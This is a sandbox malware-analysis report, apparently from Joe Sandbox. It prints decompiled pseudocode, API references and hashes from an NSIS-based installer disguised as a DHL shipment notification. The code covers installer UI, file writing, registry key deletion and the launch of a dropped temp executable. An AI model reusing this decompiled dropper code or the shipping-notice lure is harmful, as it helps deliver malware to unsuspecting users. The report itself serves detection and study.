                        			E00404F85(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                        0x00404f93
                        0x00404fa0
                        0x00404fa6
                        0x00404fe4
                        0x00404fe4
                        0x00404ff3
                        0x00404ffa
                        0x00000000
                        0x00404ffc
                        0x00404fa8
                        0x00404fb7
                        0x00404fbf
                        0x00404fc2
                        0x00404fd4
                        0x00404fda
                        0x00404fe1
                        0x00000000
                        0x00404fe1
                        0x00000000

                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404FA0
                        • GetMessagePos.USER32 ref: 00404FA8
                        • ScreenToClient.USER32 ref: 00404FC2
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FD4
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FFA
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: 51d4338ac073bbeac8b2964ce5aa15998fcdd55d82c6f64f668885239b8ba4c4
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: D6015E7194021DBADB00DBA5DD85FFEBBBCAF54711F10012BBB50B61C0D7B49A058BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x7a8ab0 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                        0x00402fa3
                        0x00402fb1
                        0x00402fb7
                        0x00402fb7
                        0x00402fc5
                        0x00402fc7
                        0x00402fd3
                        0x00402fd8
                        0x00402fda
                        0x00402fda
                        0x00402fe5
                        0x00402ff5
                        0x00403007
                        0x00403007
                        0x0040300f

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • wsprintfW.USER32 ref: 00402FE5
                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                        • SetDlgItemTextW.USER32 ref: 00403007
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                        • API String ID: 1451636040-1158693248
                        • Opcode ID: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                        • Instruction ID: 8fb0b87627a2e5c232f470bc2292a7be8d93e7e9342cf65e243ccc0cc3a46c1c
                        • Opcode Fuzzy Hash: 863410c55cf87ff373a2389e5224159976098539ce34d2f9597aa36d95ce2bb5
                        • Instruction Fuzzy Hash: 74F0367050020DABEF246F50DD49BEA3B69EB40309F00C03AF606B51D0DBBD99549B59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FB4(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406139(_t55);
				_t29 = E0040615E(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x7a8ab4;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035FE(_t49);
							E004035E8(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403377(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406119( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E00406210( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403377(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                        0x00402950
                        0x00402952
                        0x00402957
                        0x0040295c
                        0x0040295f
                        0x00402969
                        0x0040296d
                        0x0040296d
                        0x00402973
                        0x00402980
                        0x00402988
                        0x0040298b
                        0x00402997
                        0x0040299a
                        0x004029a0
                        0x004029ae
                        0x004029b3
                        0x004029b7
                        0x004029ba
                        0x004029c3
                        0x004029cf
                        0x004029d3
                        0x004029d6
                        0x004029e0
                        0x004029ff
                        0x004029e7
                        0x004029ec
                        0x004029f4
                        0x004029f7
                        0x004029fc
                        0x004029fc
                        0x00402a06
                        0x00402a06
                        0x00402a13
                        0x00402a19
                        0x00402a1f
                        0x00402a1f
                        0x004029b7
                        0x00402a33
                        0x00402a35
                        0x00402a35
                        0x00402a3f
                        0x00402a40
                        0x00402a44
                        0x00402a48
                        0x00402a4e
                        0x00402a4e
                        0x00402a55
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                        • Instruction ID: ec4356a3eb6c7711b506d5a245a30aad41ccfdb787a60eec272099fea1c037c4
                        • Opcode Fuzzy Hash: 01061f3d3ca3a4d7c364cd067c19041a51f9a0b08810e1f4a161c9a0c4070a25
                        • Instruction Fuzzy Hash: D431C271D00124BBCF216FA9CE49DDEBE79AF49364F14023AF450762E1CB798D419B98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402EA9 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                        Download Yara Rule
                        C-Code - Quality: 48%
                        			E00402EA9(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				int _v12;
				short _v536;
				void* _t27;
				signed int _t33;
				intOrPtr* _t35;
				signed int _t45;
				signed int _t46;
				signed int _t47;

				_t46 = _a12;
				_t47 = _t46 & 0x00000300;
				_t45 = _t46 & 0x00000001;
				_t27 = E004064DB(__eflags, _a4, _a8, _t47 | 0x00000009,  &_v8);
				if(_t27 == 0) {
					if((_a12 & 0x00000002) == 0) {
						L3:
						_push(0x105);
						_push( &_v536);
						_push(0);
						while(RegEnumKeyW(_v8, ??, ??, ??) == 0) {
							__eflags = _t45;
							if(__eflags != 0) {
								L10:
								RegCloseKey(_v8);
								return 0x3eb;
							}
							_t33 = E00402EA9(__eflags, _v8,  &_v536, _a12);
							__eflags = _t33;
							if(_t33 != 0) {
								break;
							}
							_push(0x105);
							_push( &_v536);
							_push(_t45);
						}
						RegCloseKey(_v8);
						_t35 = E00406A3B(3);
						if(_t35 != 0) {
							return  *_t35(_a4, _a8, _t47, 0);
						}
						return RegDeleteKeyW(_a4, _a8);
					}
					_v12 = 0;
					if(RegEnumValueW(_v8, 0,  &_v536,  &_v12, 0, 0, 0, 0) != 0x103) {
						goto L10;
					}
					goto L3;
				}
				return _t27;
			}












                        0x00402eb4
                        0x00402ebd
                        0x00402ec6
                        0x00402ed2
                        0x00402edb
                        0x00402ee5
                        0x00402f0a
                        0x00402f10
                        0x00402f15
                        0x00402f16
                        0x00402f46
                        0x00402f1f
                        0x00402f21
                        0x00402f71
                        0x00402f74
                        0x00000000
                        0x00402f7a
                        0x00402f30
                        0x00402f35
                        0x00402f37
                        0x00000000
                        0x00000000
                        0x00402f3f
                        0x00402f44
                        0x00402f45
                        0x00402f45
                        0x00402f52
                        0x00402f5a
                        0x00402f61
                        0x00000000
                        0x00402f8a
                        0x00000000
                        0x00402f69
                        0x00402ef5
                        0x00402f08
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402f08
                        0x00402f90

                        APIs
                        • RegEnumValueW.ADVAPI32 ref: 00402EFD
                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F49
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F52
                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F69
                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F74
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CloseEnum$DeleteValue
                        • String ID:
                        • API String ID: 1354259210-0
                        • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction ID: e84adf69fee3246f56ef13a6fd4e717e0861f51d99737fac189c4d1833cff19f
                        • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                        • Instruction Fuzzy Hash: 31213B7150010ABBDF11AF90CE89EEF7B7DEB54384F110076F909B21E0D7B59E54AA68
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00401D81(void* __ebx, void* __edx) {
				struct HWND__* _t30;
				WCHAR* _t38;
				void* _t48;
				void* _t53;
				signed int _t55;
				signed int _t60;
				long _t63;
				void* _t65;

				_t53 = __ebx;
				if(( *(_t65 - 0x23) & 0x00000001) == 0) {
					_t30 = GetDlgItem( *(_t65 - 8),  *(_t65 - 0x28));
				} else {
					E00402D84(2);
					 *((intOrPtr*)(__ebp - 0x10)) = __edx;
				}
				_t55 =  *(_t65 - 0x24);
				 *(_t65 + 8) = _t30;
				_t60 = _t55 & 0x00000004;
				 *(_t65 - 0x38) = _t55 & 0x00000003;
				 *(_t65 - 0x18) = _t55 >> 0x1f;
				 *(_t65 - 0x40) = _t55 >> 0x0000001e & 0x00000001;
				if((_t55 & 0x00010000) == 0) {
					_t38 =  *(_t65 - 0x2c) & 0x0000ffff;
				} else {
					_t38 = E00402DA6(0x11);
				}
				 *(_t65 - 0x44) = _t38;
				GetClientRect( *(_t65 + 8), _t65 - 0x60);
				asm("sbb esi, esi");
				_t63 = LoadImageW( ~_t60 &  *0x7a8aa0,  *(_t65 - 0x44),  *(_t65 - 0x38),  *(_t65 - 0x58) *  *(_t65 - 0x18),  *(_t65 - 0x54) *  *(_t65 - 0x40),  *(_t65 - 0x24) & 0x0000fef0);
				_t48 = SendMessageW( *(_t65 + 8), 0x172,  *(_t65 - 0x38), _t63);
				if(_t48 != _t53 &&  *(_t65 - 0x38) == _t53) {
					DeleteObject(_t48);
				}
				if( *((intOrPtr*)(_t65 - 0x30)) >= _t53) {
					_push(_t63);
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t65 - 4));
				return 0;
			}











                        0x00401d81
                        0x00401d85
                        0x00401d9a
                        0x00401d87
                        0x00401d89
                        0x00401d8f
                        0x00401d8f
                        0x00401da0
                        0x00401da3
                        0x00401dad
                        0x00401db0
                        0x00401db8
                        0x00401dc9
                        0x00401dcc
                        0x00401dd7
                        0x00401dce
                        0x00401dd0
                        0x00401dd0
                        0x00401ddb
                        0x00401de5
                        0x00401e0c
                        0x00401e1b
                        0x00401e29
                        0x00401e31
                        0x00401e39
                        0x00401e39
                        0x00401e42
                        0x00401e48
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                        • String ID:
                        • API String ID: 1849352358-0
                        • Opcode ID: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                        • Instruction ID: 474cd979728561ffe20026c9632071baa6ad0bc9fd2f813aa8d1396f3614d648
                        • Opcode Fuzzy Hash: f665995d6bdb305172d13ad54de642187c856862005d3c57e5c2f614b82d9191
                        • Instruction Fuzzy Hash: DC212672D00119AFCF05CBA4DE45AEEBBB5EF08304F14403AF945F62A0DB389951DB98
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401E4E Relevance: 7.5, APIs: 5, Instructions: 43COMMON
                        Download Yara Rule
                        C-Code - Quality: 73%
                        			E00401E4E(intOrPtr __edx) {
				void* __edi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				void* _t31;
				struct HDC__* _t33;
				void* _t35;

				_t30 = __edx;
				_t33 = GetDC( *(_t35 - 8));
				_t9 = E00402D84(2);
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				0x40cdf8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t33, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t33);
				 *0x40ce08 = E00402D84(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x20));
				 *((intOrPtr*)(_t35 - 0x10)) = _t30;
				 *0x40ce0f = 1;
				 *0x40ce0c = _t15 & 0x00000001;
				 *0x40ce0d = _t15 & 0x00000002;
				 *0x40ce0e = _t15 & 0x00000004;
				E004066AB(_t9, _t31, _t33, 0x40ce14,  *((intOrPtr*)(_t35 - 0x2c)));
				_t18 = CreateFontIndirectW(0x40cdf8);
				_push(_t18);
				_push(_t31);
				E004065B5();
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                        0x00401e4e
                        0x00401e59
                        0x00401e5b
                        0x00401e68
                        0x00401e7f
                        0x00401e84
                        0x00401e91
                        0x00401e96
                        0x00401e9a
                        0x00401ea5
                        0x00401eac
                        0x00401ebe
                        0x00401ec4
                        0x00401ec9
                        0x00401ed3
                        0x00402638
                        0x0040156d
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GetDC.USER32(?), ref: 00401E51
                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                        • ReleaseDC.USER32 ref: 00401E84
                          • Part of subcall function 004066AB: lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,\Microsoft\Internet Explorer\Quick Launch), ref: 00406850
                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                        • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                        Memory Dump Source
                        • Source File: 00000000.00000002.270931837.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.270922878.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270947538.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270955447.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.270961651.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271408505.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271418700.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271429193.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271484723.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271497474.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.271512211.00000000007B9000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL SHIPMENT NOTIFICATION 1146789443.jbxd
                        Similarity
                        • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                        • String ID:
                        • API String ID: 2584051700-0
                        • Opcode ID: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction ID: c4fbce1732c038d4ae3387388930f25584bd8a0c3a5059ecf0713bcf7412b626
                        • Opcode Fuzzy Hash: da8e727cde32dbac5ba0c7db49ef74d213bcb2a0e3f4fe6d3c107a90d4fe1e84
                        • Instruction Fuzzy Hash: 0E01B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 59%
                        			E00401C43(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				WCHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t63;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402D84(3);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 - 0x18) = _t29;
				_t30 = E00402D84(4);
				 *((intOrPtr*)(_t64 - 0x10)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x1c) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x18)) = E00402DA6(0x33);
				}
				__eflags =  *(_t64 - 0x1c) & 0x00000002;
				if(( *(_t64 - 0x1c) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402DA6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x34)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t61 = E00402DA6();
					_t32 = E00402DA6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t61;
					__eflags = _t35;
					_t36 = FindWindowExW( *(_t64 - 0x18),  *(_t64 + 8), _t35,  ~( *_t32) & _t32);
					goto L10;
				} else {
					_t63 = E00402D84();
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t41 = E00402D84(2);
					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
					_t56 =  *(_t64 - 0x1c) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
						L10:
						 *(_t64 - 0x38) = _t36;
					} else {
						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
					_push( *(_t64 - 0x38));
					E004065B5();
				}
				 *0x7a8b28 =  *0x7a8b28 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                        0x00401c43
                        0x00401c45
                        0x00401c4c
                        0x00401c4f
                        0x00401c52
                        0x00401c5c
                        0x00401c60
                        0x00401c63
                        0x00401c6c
                        0x00401c6c
                        0x00401c6f
                        0x00401c73
                        0x00401c7c
                        0x00401c7c
                        0x00401c7f
                        0x00401c83
                        0x00401c85
                        0x00401cda
                        0x00401cdc
                        0x00401ce7
                        0x00401cf1
                        0x00401cf4
                        0x00401cf4
                        0x00401cfd
                        0x00000000
                        0x00401c87
                        0x00401c8e
                        0x00401c90
                        0x00401c93
                        0x00401c99
                        0x00401ca0
                        0x00401ca3
                        0x00401ccb
                        0x00401d03
                        0x00401d03
                        0x00401ca5
                        0x00401cb3
                        0x00401cbb
                        0x00401cbe
                        0x00401cbe
                        0x00401ca3
                        0x00401d06
                        0x00401d09
                        0x00401d0f
                        0x00402ba4
                        0x00402ba4
                        0x00402c2d
                        0x00402c39

                        APIs
                        • SendMessageTimeoutW.USER32 ref: 00401CB3
                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                        Strings
                        Memory Dump Source
